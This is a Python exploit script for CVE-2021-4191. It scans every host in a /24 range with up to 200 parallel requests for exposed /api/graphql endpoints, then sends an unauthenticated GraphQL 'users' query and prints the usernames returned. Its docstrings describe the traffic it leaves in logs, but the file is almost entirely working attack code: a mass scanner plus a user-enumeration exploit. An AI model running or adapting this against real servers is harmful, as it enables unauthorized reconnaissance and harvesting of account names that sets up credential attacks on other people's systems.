CVE-2021-4191.py
#!/bin/python3
import json
import requests
import urllib3
from colorama import Fore as color
import argparse
import ipaddress
from concurrent.futures import ThreadPoolExecutor
# Short aliases for the colorama foreground codes used in every status line.
G, C, M, W = color.GREEN, color.CYAN, color.MAGENTA, color.WHITE

# Several requests in this script pass verify=False, so the server certificate
# is not validated. Disabling InsecureRequestWarning only hides the warning
# text; the responses remain unauthenticated at the TLS layer.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def check_api_graphql(ip):
    """Probe every host of ``ip``/24 for an HTTPS ``/api/graphql`` path and print one line per host.

    ``ip`` is concatenated with ``/24`` and handed to ``ipaddress.IPv4Network``,
    which raises ``ValueError`` for a value with host bits set or one that
    already carries a prefix length.

    What a "Success" line establishes: the pooled ``make_request`` GET returned
    a truthy response and a second GET (certificate verification off, 3-second
    timeout) returned HTTP 200. Nothing in the check inspects the body, so it
    does not show that the host runs a particular product or version.

    Traffic shape, for anyone matching this against logs: up to 200 concurrent
    GET requests to ``/api/graphql`` across the 254 host addresses of one /24,
    then one further sequential GET per host.
    """
    with ThreadPoolExecutor(max_workers=200) as pool:
        subnet = ipaddress.IPv4Network(f'{ip}/24')
        endpoints = [f"https://{host}/api/graphql" for host in subnet.hosts()]
        # Queue the first probe for every address before collecting any result.
        pending = [(url, pool.submit(make_request, url)) for url in endpoints]

        for url, job in pending:
            try:
                first_probe = job.result()
                # Second GET, issued from this thread with verify=False.
                second_probe = requests.get(url, timeout=3, verify=False)
            except requests.exceptions.RequestException:
                print(f"{G}[{M}+{G}] {M}- {W}{url} {G}[{C}Failed{G}] {W}Request failed.")
            else:
                if first_probe and second_probe.status_code == 200:
                    print(f"{G}[{M}+{G}] {M}- {W}{url} {G}[{C}Success{G}] {W}GraphQL API found!")
                else:
                    print(f"{G}[{M}+{G}] {M}- {W}{url} {G}[{C}Failed{G}] {W}GraphQL API not found.")
def make_request(url):
    """GET ``url`` with a 5-second timeout; return the response, or ``None`` on a requests error.

    No ``verify`` argument is passed, so certificate validation stays at the
    requests default (enabled), unlike the other calls in this file. A TLS
    validation failure is a ``RequestException`` and is reported as ``None``.
    """
    try:
        return requests.get(url, timeout=5)
    except requests.exceptions.RequestException:
        return None
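def main(url):
    """Send one GraphQL ``users`` query without credentials and print the usernames returned.

    The request carries no token or session, so every username printed is data
    the instance at ``url`` serves to anonymous clients (the exposure this file
    is named for, CVE-2021-4191). Only the first page is read: ``pageInfo`` is
    requested but never followed.

    Args:
        url: Base URL of the instance; ``/api/graphql`` is appended to it.

    In server logs this appears as an anonymous POST to ``/api/graphql`` whose
    JSON body holds a ``users { ... nodes { username } }`` selection.
    """
    headers = {
        "Content-Type": "application/json",
    }
    data = {
        "query": "query { users { pageInfo { hasNextPage, hasPreviousPage, endCursor, startCursor }, nodes { username } } }"
    }
    try:
        # verify=False: the certificate is not checked, so the answer is not
        # tied to the named host. The timeout keeps a silent host from hanging
        # the script indefinitely.
        response = requests.post(
            url + "/api/graphql",
            json=data,
            headers=headers,
            verify=False,
            timeout=10,
        )
    except requests.exceptions.RequestException as exc:
        print(f"Request failed: {exc}")
        return

    if response.status_code != 200:
        print(f"Request failed with status code: {response.status_code}")
        return

    try:
        result = response.json()
        # An instance that refuses the query can still answer 200 with
        # "data": null or an "errors" member; treat that as "no list" rather
        # than crashing on the subscript.
        usernames = [user['username'] for user in result['data']['users']['nodes']]
    except (ValueError, KeyError, TypeError):
        print(f"{url}: response did not contain a user list.")
        return

    for username in usernames:
        print(f"{G}[{M}+{G}] {M}- {W}{url} {G}[{C}username{G}] {W}{username}")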
if __name__ == "__main__":
    cli = argparse.ArgumentParser(description="Query the GraphQL API and display usernames.")
    cli.add_argument("--url", type=str, required=True, help="The URL of the GraphQL API endpoint.")
    cli.add_argument("--ip-range", type=str, help="The IP range to scan for /api/graphql")
    opts = cli.parse_args()

    # --url is required by argparse, so the error branch is only reached when
    # it is given as an empty string. When --ip-range is also supplied, the
    # --url value is parsed but not used by check_api_graphql.
    if not opts.url:
        print("Error: You need to provide either both --url and --ip-range or just --url.")
    elif opts.ip_range:
        check_api_graphql(opts.ip_range)
    else:
        main(opts.url)